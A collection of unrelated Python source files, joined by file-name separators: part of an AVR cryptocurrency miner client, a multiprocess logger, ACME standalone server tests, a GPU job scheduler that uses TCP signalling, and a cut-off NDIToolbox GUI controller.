if result[0] and result[1]:
break
except Exception as e:
debug_output(
com + ': retrying reading data: ' + str(e))
retry_counter += 1
except Exception as e:
debug_output(
com + ': retrying sending data: ' + str(e))
retry_counter += 1
try:
debug_output(
com + ': received result (' + str(result[0]) + ')')
debug_output(
com + ': received time (' + str(result[1]) + ')')
# Convert AVR time to seconds
computetime = round(int(result[1]) / 1000000, 3)
if computetime < 1:
computetime = str(int(computetime * 1000)) + "ms"
else:
computetime = str(round(computetime, 2)) + "s"
# Calculate hashrate
hashrate_t = round(
int(result[0]) * 1000000 / int(result[1]), 2)
hashrate_mean.append(hashrate_t)
# Get average from the last hashrate measurements
hashrate = hashrate_t # mean(hashrate_mean[-5:])
debug_output(
com +
': calculated hashrate (' + str(hashrate_t) + ')'
+ ' (avg:' + str(hashrate) + ')')
try:
chipID = result[2]
debug_output(
com + ': chip ID: ' + str(result[2]))
""" Check if chipID got received, this is
of course just a fraction of what's
happening on the server with it """
if not chipID.startswith('DUCOID'):
raise Exception('Wrong chipID string')
except Exception:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
' Possible incorrect chip ID!'
+ Style.NORMAL
+ Fore.RESET
+ ' This will cause problems with the future'
+ ' release of Kolka security system',
'warning')
chipID = 'None'
break
except Exception as e:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
get_string('mining_avr_connection_error')
+ Style.NORMAL
+ Fore.RESET
+ ' (error reading result from the board: '
+ str(e)
+ ', please check connection and port setting)',
'warning')
debug_output(
com + ': error splitting data: ' + str(e))
sleep(1)
try:
# Send result to the server
soc.sendall(
bytes(
str(result[0])
+ ','
+ str(hashrate)
+ ',Official AVR Miner (DUCO-S1A) v'
+ str(MINER_VER)
+ ','
+ str(rig_identifier)
+ ','
+ str(chipID),
encoding='utf8'))
except Exception as e:
pretty_print(
'net'
+ str(''.join(filter(str.isdigit, com))),
get_string('connecting_error')
+ Style.NORMAL
+ Fore.RESET
+ ' ('
+ str(e)
+ ')',
'error')
debug_output(com + ': connection error: ' + str(e))
sleep(5)
soc = connect()
while True:
try:
responsetimetart = now()
feedback = soc.recv(64).decode().rstrip('\n')
responsetimestop = now()
time_delta = (responsetimestop -
responsetimetart).microseconds
ping = round(time_delta / 1000)
debug_output(com + ': feedback: '
+ str(feedback)
+ ' with ping: '
+ str(ping))
break
except Exception as e:
pretty_print(
'net'
+ str(''.join(filter(str.isdigit, com))),
get_string('connecting_error')
+ Style.NORMAL
+ Fore.RESET
+ ' (err parsing response: '
+ str(e)
+ ')',
'error')
debug_output(com + ': error parsing response: '
+ str(e))
sleep(5)
soc = connect()
if feedback == 'GOOD':
# If result was correct
shares[0] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.GREEN
+ ' ⛏'
+ get_string('accepted')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
elif feedback == 'BLOCK':
# If block was found
shares[0] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.CYAN
+ ' ⛏'
+ get_string('block_found')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
else:
# If result was incorrect
shares[1] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.RED
+ ' ⛏'
+ get_string('rejected')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
break
if __name__ == '__main__':
# Unicode fix for windows
if osname == "nt":
ossystem("chcp 65001")
# Colorama
init(autoreset=True)
# Window title
title(get_string('duco_avr_miner') + str(MINER_VER) + ')')
try:
# Load config file or create new one
load_config()
debug_output('Config file loaded')
except Exception as e:
pretty_print(
'sys0',
get_string('load_config_error')
+ RESOURCES_DIR
+ get_string('load_config_error_warning')
+ Style.NORMAL
+ Fore.RESET
+ ' ('
+ str(e)
+ ')',
'error')
debug_output('Error reading configfile: ' + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
greeting()
debug_output('greeting displayed')
except Exception as e:
debug_output('Error displaying greeting message: ' + str(e))
try:
# Start donation thread
donate()
except Exception as e:
debug_output('Error launching donation thread: ' + str(e))
try:
# Launch avr duco mining threads
for port in avrport:
thrThread(
target=mine_avr,
args=(port,)).start()
except Exception as e:
debug_output('Error launching AVR thread(s): ' + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
init_rich_presence()
thrThread(
target=update_rich_presence).start()
except Exception as e:
debug_output('Error launching Discord RPC thread: ' + str(e))
|
multiprocess_logger.py | import logging
import logging.handlers
import traceback
from typing import Callable, Tuple
import multiprocessing as mp
class MultiProcessLoggerListener:
"""
Using a independent process to write logger, suitable for multiprocess logging.
One can use queue handler to write log from other process, e.g.
```
name = multiprocessing.current_process().name
h = logging.handlers.QueueHandler(MultiProcessLogger.queue)
logger = logging.getLogger("worker_process.{}".format(name))
logger.addHandler(h)
logger.setLevel(logging.DEBUG)
```
"""
def __init__(self, logger_constructor: Callable[[], Tuple[logging.Logger, str]], mp_context="spawn"):
"""
Args:
logger_constructor: function to create root logger
"""
mmp = mp.get_context(mp_context)
self._queue = mmp.Queue(-1)
self._logger_constructor = logger_constructor
self.listener = mp.Process(target=self.listen, name="listener")
self.listener.start()
def listen(self):
root, _ = self._logger_constructor()
root.info("Starting...")
while True:
try:
record = self._queue.get()
if record is None:
root.info("Stopped")
break
logger = logging.getLogger(record.name)
logger.handle(record)
except Exception as e:
tb = traceback.format_exc()
root.fatal("Exception:\n{}\nTraceback:\n{}".format(e, tb))
@property
def queue(self) -> mp.Queue:
return self._queue
def stop(self):
"""
Stop listener process and join
"""
self._queue.put_nowait(None)
self.join()
def join(self):
"""
Wait for listener stop
"""
self.listener.join()
def get_logger(self, name: str = None, level: int = logging.INFO):
logger = logging.getLogger(name)
handler = logging.handlers.QueueHandler(self._queue)
logger.addHandler(handler)
logger.setLevel(level)
return logger
def __del__(self):
self.stop()
|
standalone_test.py | """Tests for acme.standalone."""
import os
import shutil
import threading
import tempfile
import time
import unittest
from six.moves import http_client # pylint: disable=import-error
from six.moves import socketserver # pylint: disable=import-error
import requests
from acme import challenges
from acme import crypto_util
from acme import errors
from acme import jose
from acme import test_util
class TLSServerTest(unittest.TestCase):
"""Tests for acme.standalone.TLSServer."""
def test_bind(self): # pylint: disable=no-self-use
from acme.standalone import TLSServer
server = TLSServer(
('', 0), socketserver.BaseRequestHandler, bind_and_activate=True)
server.server_close() # pylint: disable=no-member
class TLSSNI01ServerTest(unittest.TestCase):
"""Test for acme.standalone.TLSSNI01Server."""
def setUp(self):
self.certs = {
b'localhost': (test_util.load_pyopenssl_private_key('rsa512_key.pem'),
# pylint: disable=protected-access
test_util.load_cert('cert.pem')._wrapped),
}
from acme.standalone import TLSSNI01Server
self.server = TLSSNI01Server(("", 0), certs=self.certs)
# pylint: disable=no-member
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown() # pylint: disable=no-member
self.thread.join()
def test_it(self):
host, port = self.server.socket.getsockname()[:2]
cert = crypto_util.probe_sni(b'localhost', host=host, port=port, timeout=1)
self.assertEqual(jose.ComparableX509(cert),
jose.ComparableX509(self.certs[b'localhost'][1]))
class HTTP01ServerTest(unittest.TestCase):
"""Tests for acme.standalone.HTTP01Server."""
def setUp(self):
self.account_key = jose.JWK.load(
test_util.load_vector('rsa1024_key.pem'))
self.resources = set()
from acme.standalone import HTTP01Server
self.server = HTTP01Server(('', 0), resources=self.resources)
# pylint: disable=no-member
self.port = self.server.socket.getsockname()[1]
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.start()
def tearDown(self):
self.server.shutdown() # pylint: disable=no-member
self.thread.join()
def test_index(self):
response = requests.get(
'http://localhost:{0}'.format(self.port), verify=False)
self.assertEqual(
response.text, 'ACME client standalone challenge solver')
self.assertTrue(response.ok)
def test_404(self):
response = requests.get(
'http://localhost:{0}/foo'.format(self.port), verify=False)
self.assertEqual(response.status_code, http_client.NOT_FOUND)
def _test_http01(self, add):
chall = challenges.HTTP01(token=(b'x' * 16))
response, validation = chall.response_and_validation(self.account_key)
from acme.standalone import HTTP01RequestHandler
resource = HTTP01RequestHandler.HTTP01Resource(
chall=chall, response=response, validation=validation)
if add:
self.resources.add(resource)
return resource.response.simple_verify(
resource.chall, 'localhost', self.account_key.public_key(),
port=self.port)
def test_http01_found(self):
self.assertTrue(self._test_http01(add=True))
def test_http01_not_found(self):
self.assertFalse(self._test_http01(add=False))
class TestSimpleTLSSNI01Server(unittest.TestCase):
"""Tests for acme.standalone.simple_tls_sni_01_server."""
def setUp(self):
# mirror ../examples/standalone
self.test_cwd = tempfile.mkdtemp()
localhost_dir = os.path.join(self.test_cwd, 'localhost')
os.makedirs(localhost_dir)
shutil.copy(test_util.vector_path('cert.pem'), localhost_dir)
shutil.copy(test_util.vector_path('rsa512_key.pem'),
os.path.join(localhost_dir, 'key.pem'))
from acme.standalone import simple_tls_sni_01_server
self.port = 1234
self.thread = threading.Thread(
target=simple_tls_sni_01_server, kwargs={
'cli_args': ('xxx', '--port', str(self.port)),
'forever': False,
},
)
self.old_cwd = os.getcwd()
os.chdir(self.test_cwd)
self.thread.start()
def tearDown(self):
os.chdir(self.old_cwd)
self.thread.join()
shutil.rmtree(self.test_cwd)
def test_it(self):
max_attempts = 5
while max_attempts:
max_attempts -= 1
try:
cert = crypto_util.probe_sni(b'localhost', b'0.0.0.0', self.port)
except errors.Error:
self.assertTrue(max_attempts > 0, "Timeout!")
time.sleep(1) # wait until thread starts
else:
self.assertEqual(jose.ComparableX509(cert),
test_util.load_cert('cert.pem'))
break
if __name__ == "__main__":
unittest.main() # pragma: no cover
|
main.py | import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
queue = []
for i in range(50):
queue.append(i+1)
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
for item in queue:
JCT[str(item)] = 0
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
index = 0
V100_cap = 4
V100_used = 0
qualified_jobs = 0
V100_job = {}
for i in range(4):
V100_job[str(i)] = 'idle'
qualified_job = []
pc_job = [] # list of jobs that are pratically completed
V100_node = 'd1021'
host_node = 'c0192'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
QUALIFY_TIME = 300 # 600s or 10min as threshold
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10001 if node == V100_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# start job
def start_job(node, gpu, job):
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
############### first clear finish status of all jobs ####################
pid_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
pid_dict[job_name] = 0
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
finish_dict[job_name] = 0
#################### background thread running TCP socket ########################
def thread_function():
# here listen on the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
if 'param' in data_str:
pass
elif 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
# move overhead profiling here
global ovhd_start
global overhead
job = job_name.replace('job','')
if ovhd_start[job] != 0:
if ckpt_qual_dict[job_name] == 1:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job', '')
finish_dict[job_name] = 1
JCT[job] = int(time.time() - job_start[job])
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on V100 ##############################
for gpu, job in V100_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
V100_used -= 1
V100_job[gpu] = 'idle'
print('V100 finished job: ' + job)
################ check run time of current V100 job, update qualified_job #################
for job in list(V100_job.values()):
if job not in qualified_job and job != 'idle':
runtime = int(time.time() - job_start[job])
if runtime >= QUALIFY_TIME:
qualified_job.append(job)
print('job' + job + ' has been qualified for promotion')
################ make promotion decisions ########################
V100_free = V100_cap - V100_used
################ submit new jobs to vacant V100 GPUs ############################
# check if there are vacant V100s
## yes: submit jobs from queue
## no: do nothing
if V100_used < V100_cap:
V100_free = V100_cap - V100_used
for i in range(V100_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in V100_job.items():
if job == 'idle': # schedule new job here if idle
start_job(V100_node, gpu, job_new)
V100_job[gpu] = job_new
job_start[job_new] = time.time()
index += 1
V100_used += 1
time.sleep(5) # don't communicate too often
break
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
V100_idle_num = sum(value == 'idle' for value in V100_job.values())
if V100_idle_num == V100_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
print('finished all runs')
JCT_name = testcase + '_JCT.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
|
mainui_ctrl.py | """ mainui_ctrl.py - controller for mainui
Chris R. Coughlin (TRI/Austin, Inc.)
"""
__author__ = 'Chris R. Coughlin'
from models import mainmodel
from models import dataio
from models import workerthread
import views.plotwindow as plotwindow
import views.preview_window as preview_window
import views.dialogs as dlg
from views import podtk
from views import adatk
from views import DSF_podtk
import controllers.pathfinder as pathfinder
import controllers.open_file as open_file
import wx
import gc
import imp
import os.path
import Queue
import sys
import webbrowser
module_logger = mainmodel.get_logger(__name__)
class MainUIController(object):
"""Controller for the main user interface"""
def __init__(self, view):
self.view = view
self.init_model()
def init_model(self):
"""Creates and connects the model, ensures data paths are available"""
self.model = mainmodel.MainModel(self)
def verify_userpath(self):
"""Ensures the user's data folder is available"""
if not os.path.exists(pathfinder.user_path()):
module_logger.info("Created user data folder")
self.set_userpath()
self.model.check_user_path()
self.model.copy_system_plugins()
def verify_imports(self):
"""Ensures third-party dependencies are installed; shows
error dialog and exits if a module is missing."""
if not hasattr(sys, 'frozen'):
module_logger.info("Not frozen, checking module dependencies.")
dependencies = ['h5py', 'dicom', 'matplotlib', 'numpy', 'scipy']
for module in dependencies:
try:
imp.find_module(module)
except ImportError: # Module not installed / not found
module_logger.error("Module {0} was not found, aborting.".format(module))
msg = ' '.join(["Unable to find the '{0}' module.".format(module),
"Please ensure the module is installed and",
"restart NDIToolbox."])
err_dlg = wx.MessageDialog(self.view, message=msg,
caption="{0} Module Not Found".format(module), style=wx.ICON_ERROR)
err_dlg.ShowModal()
err_dlg.Destroy()
sys.exit(0)
else:
module_logger.info("Frozen, skipping module dependency checks.")
def get_icon_bmp(self):
"""Returns a PNG wx.Bitmap of the application's
default icon"""
icon_bmp_path = pathfinder.icon_path()
return wx.Bitmap(icon_bmp_path, wx.BITMAP_TYPE_PNG)
def get_icon(self):
"""Returns a wx.Icon of the application's
default icon"""
if sys.platform != 'win32':
return wx.IconFromBitmap(self.get_icon_bmp())
icon = wx.Icon(pathfinder.winicon_path(), wx.BITMAP_TYPE_ICO)
return icon
def get_bitmap(self, bitmap_name):
"""Returns a wx.Bitmap instance of the given bitmap's name if
found in the app's resources folder."""
full_bitmap_path = os.path.join(pathfinder.bitmap_path(), bitmap_name)
if os.path.exists(full_bitmap_path):
return wx.Bitmap(name=full_bitmap_path, type=wx.BITMAP_TYPE_PNG)
return None
def set_thumb(self, panel, data_file, enable=True):
"""Sets the bitmap contents of the specified panel to a thumbnail
plot of the selected data file, or a placeholder bitmap if thumbnails
are disabled."""
if enable:
panel.plot_thumb(data_file)
else:
panel.plot_blank()
def get_default_position(self):
"""Returns the default (x, y) coordinates of the
main application window"""
coordinates = [0, 0]
cfg_coordinates = self.model.get_coords()
# Basic sanity check - ensure negative dimensions
# weren't provided
if cfg_coordinates:
if cfg_coordinates[0] > 0:
coordinates[0] = cfg_coordinates[0]
if cfg_coordinates[1] > 0:
coordinates[1] = cfg_coordinates[1]
return coordinates
def get_window_size(self):
"""Returns the window size of the main application window from the configuration file"""
window_size = [300, 600]
cfg_win_size = self.model.get_window_size()
return cfg_win_size
def get_preview_state(self):
"""Returns the current enable/disable thumbnail
previews setting from the application's config file"""
preview_state = self.model.get_preview_state()
if preview_state is None:
return True
return preview_state
def open_url(self, url):
"""Opens the specified URL in the user's default web browser."""
if url is not None:
webbrowser.open_new_tab(url)
# Event Handlers
def on_quit(self, evt):
"""Handles the Quit event"""
self.model.set_coords(list(self.view.GetPosition()))
self.model.set_window_size(list(self.view.GetClientSizeTuple()))
self.view._mgr.UnInit()
self.view.Destroy()
def on_window_destroy(self, evt):
"""Attempts to free up memory every time a window is destroyed"""
# wxPython seems to require a delay before calling garbage collection
wx.CallLater(1000, gc.collect)
def on_help(self, evt):
"""Handles request to open help documents"""
self.open_url(os.path.join(pathfinder.docs_path(), 'index.html'))
def on_quickstart(self, evt):
"""Handles request to open Getting Started guide"""
self.open_url(os.path.join(pathfinder.docs_path(), 'quickstart.html'))
def on_plugins(self, evt):
"""Handles request to open guide to plugins for end users"""
self.open_url(os.path.join(pathfinder.docs_path(), 'plugins.html'))
def on_plugins_dev(self, evt):
"""Handles request to open guide to plugins for developers"""
self.open_url(os.path.join(pathfinder.docs_path(), 'plugins_developers.html'))
def on_plugins_samples(self, evt):
"""Handles request to open examples of NDIToolbox plugins"""
self.open_url(os.path.join(pathfinder.docs_path(), 'plugins_samples.html'))
def on_about(self, evt):
"""Handles the About This Program event"""
project_logo = os.path.join(pathfinder.icons_path(), 'nditoolbox.png')
project_msg = ' '.join(
("NDIToolbox (TM) Copyright (c) 2013 TRI/Austin, Inc. Developed under TRI Project A7117.",
"\n\nUse of this software is governed by the terms outlined in the license.txt file.",
"\n\nProject Manager: David Forsyth",
"\nLead Developer: Chris Coughlin")
)
about_project_logo_dlg = dlg.AboutDialog(parent=self.view, title="About This Program",
msg=project_msg, url="http://www.nditoolbox.com",
logobmp_fname=project_logo)
about_project_logo_dlg.ShowModal()
about_project_logo_dlg.Destroy()
def on_about_license(self, evt):
"""Handles the License Information event"""
license_file = os.path.join(pathfinder.app_path(), 'license.txt')
with open(license_file, 'rb') as fidin:
license = fidin.readlines()
license_dlg = dlg.TextDisplayDialog(parent=self.view, text=''.join(license),
title="License Information",
style=wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER)
license_dlg.Show()
def on_about_tri(self, evt):
"""Handles the About TRI event"""
tri_logo = os.path.join(pathfinder.bitmap_path(), "tri_austin_logo.png")
tri_msg = ' '.join(
("Texas Research Institute Austin, Inc. (TRI/Austin) is TRI's flagship company",
"and conducts materials research and development projects.\n\nTRI is committed to",
"providing the highest quality materials science products and services."))
about_tri_dlg = dlg.AboutDialog(parent=self.view, title="About TRI",
msg=tri_msg,
url="http://www.tri-austin.com",
logobmp_fname=tri_logo)
about_tri_dlg.ShowModal()
about_tri_dlg.Destroy()
def on_about_icons(self, evt):
"""Handles the About Icons event"""
axialis_logo = os.path.join(pathfinder.bitmap_path(), "axialis_logo.png")
axialis_msg = ' '.join(("Some icons courtesy Axialis Software and the",
"Axialis Team, and were created by",
"Axialis IconWorkshop."))
about_axialisicons_dlg = dlg.AboutDialog(parent=self.view, title="About Axialis Icons",
msg=axialis_msg,
url="http://www.axialis.com",
logobmp_fname=axialis_logo)
about_axialisicons_dlg.ShowModal()
about_axialisicons_dlg.Destroy()
def on_display_log(self, evt):
"""Handles request to display application log"""
try:
wx.BeginBusyCursor()
log_path = pathfinder.log_path()
default_log_contents = ['Log is currently empty.']
log_contents = []
if os.path.exists(log_path):
with open(log_path, "r") as fidin:
log_contents = fidin.readlines()
if len(log_contents) is 0:
log_contents = default_log_contents
text_display_dlg = dlg.TextDisplayDialog(parent=self.view, text=log_contents,
title='NDIToolbox Log - {0}'.format(log_path),
wrap=False,
style=wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER)
text_display_dlg.Show()
finally:
wx.EndBusyCursor()
def on_clear_log(self, evt):
"""Handles request to delete the application log."""
log_path = pathfinder.log_path()
if os.path.exists(log_path):
confirm_deletion_dlg = wx.MessageDialog(parent=self.view.parent,
caption="Delete Log?",
message="Are you sure you want to delete the log?",
style=wx.OK | wx.CANCEL)
if confirm_deletion_dlg.ShowModal() == wx.ID_OK:
try:
mainmodel.clear_log()
except WindowsError: # File in use (Windows)
err_msg = "Unable to delete log-Windows reports the file is in use."
err_dlg = wx.MessageDialog(self.view, message=err_msg,
caption="Unable To Delete Log", style=wx.ICON_ERROR)
err_dlg.ShowModal()
err_dlg.Destroy()
def on_data_select(self, evt):
"""Handles a change in data file selection by providing a preview plot
of the data"""
self.set_thumb(panel=self.view.thumbnail_panel, data_file=self.view.data_panel.data,
enable=self.view.toolbar.GetToolState(self.view.gen_bitmaps_tool.GetId()))
if self.view.data_panel.data:
self.view.enable_data_tools()
else:
self.view.disable_data_tools()
def on_preview_toggle(self, evt):
"""Handles toggling data thumbnail plot previews"""
preview_state = self.view.toolbar.GetToolState(self.view.gen_bitmaps_tool.GetId())
if preview_state:
self.set_thumb(panel=self.view.thumbnail_panel, data_file=self.view.data_panel.data,
enable=preview_state)
self.view.enable_preview_panel(preview_state)
self.model.set_preview_state(preview_state)
def on_refresh_data(self, evt):
"""Handles request to update contents of data folder"""
self.refresh_data()
def refresh_data(self):
"""Instructs UI to update list of data folder contents"""
self.model.remove_thumbs()
self.view.data_panel.populate()
def on_add_data(self, evt):
"""Handles request to add data to data folder"""
default_wildcard = "NDIToolbox Files (*.hdf5)|*.hdf5"
allfiles_wildcard = "All Files (*.*)|*.*"
img_wildcards = "Image Files|(*.bmp;*.dcx;*.eps;*.gif;*.im;*.imt;*.jpg;*.jpeg;*.pcx;*.png;*.ppm;*.psd;*.sgi;*.tga;*.tiff;*.xpm)"
txt_wildcards = "Text Files|*.txt;*.csv;*.dat;*.tab;*.asc"
winspect_wildcard = "Winspect 6/7 CScans |*.sdt"
utwin_wildcard = "UTWin CScans |*.csc"
dicom_wildcard = "DICOM/DICONDE |*.dcm"
wildcards = "|".join([default_wildcard, img_wildcards, txt_wildcards, winspect_wildcard,
utwin_wildcard, dicom_wildcard, allfiles_wildcard])
file_dlg = wx.FileDialog(parent=self.view.parent, message='Please specify a data file',
wildcard=wildcards, style=wx.FD_OPEN)
if file_dlg.ShowModal() == wx.ID_OK:
self.select_import_function(file_dlg.GetPath())
def select_import_function(self, file_to_import):
"""Asks the user to specify the file format to use to import the given data file"""
import_dlg = dlg.ImportDataDialog(parent=self.view, file_name=file_to_import)
try:
wx.BeginBusyCursor()
if import_dlg.ShowModal() == wx.ID_OK:
file_type = import_dlg.get_selected_filetype()
if file_type == 'hdf5': # Native NDIToolbox HDF5
self.import_hdf5(file_to_import)
elif file_type == 'text': # Delimited Text
self.import_text(file_to_import)
elif file_type == 'image': # Bitmaps
self.import_image(file_to_import)
elif file_type == 'utwin_cscan': # UTWin Cscan (.csc)
self.import_csc(file_to_import)
elif file_type == 'winspect7': # Winspect 6 or 7 (.sdt)
self.import_sdt(file_to_import)
elif file_type == 'dicom': # DICOM/DICONDE (.dcm)
self.import_dicom(file_to_import)
finally:
import_dlg.Destroy()
wx.EndBusyCursor()
def on_browse_userpath(self, evt):
"""Handles request to browse to the default userpath"""
try:
open_file.open_file(pathfinder.user_path())
except IOError: # file not found
module_logger.error("User folder {0} not found.".format(pathfinder.user_path()))
err_msg = "Unable to find folder '{0}'.\nPlease ensure the folder exists.".format(pathfinder.user_path())
err_dlg = wx.MessageDialog(self.view, message=err_msg,
caption="Unable To Open Folder", style=wx.ICON_ERROR)
err_dlg.ShowModal()
err_dlg.Destroy()
except OSError as err: # other OS error
module_logger.error("Unidentified OS error {0}".format(err))
err_msg = "Unable to browse to data folder, error reported was:\n{0}".format(err)
err_dlg = wx.MessageDialog(self.view, message=err_msg,
caption="Unable To Open Folder", style=wx.ICON_ERROR)
err_dlg.ShowModal()
err_dlg.Destroy()
def on_choose_userpath(self, evt):
"""Handles request to set the default userpath"""
self.set_userpath()
def set_userpath(self):
""" Prompts user to set a default path for storing user data """
try:
current_user_path = pathfinder.user_path()
path_dlg = wx.DirDialog(parent=self.view.parent, message="Please specify a data folder",
defaultPath=current_user_path)
if path_dlg.ShowModal() == wx.ID_OK:
new_user_path = path_dlg.GetPath()
self.model.migrate_user_path(new_user_path)
self.refresh_data()
finally:
path_dlg.Destroy()
def on_choose_loglevel(self, evt):
"""Handles request to set the log level severity"""
available_log_levels = mainmodel.available_log_levels
current_log_level_str = available_log_levels[0]
log_level_strs = available_log_levels.keys()
current_log_level = mainmodel.get_loglevel()
for log_str, log_lvl in available_log_levels.iteritems():
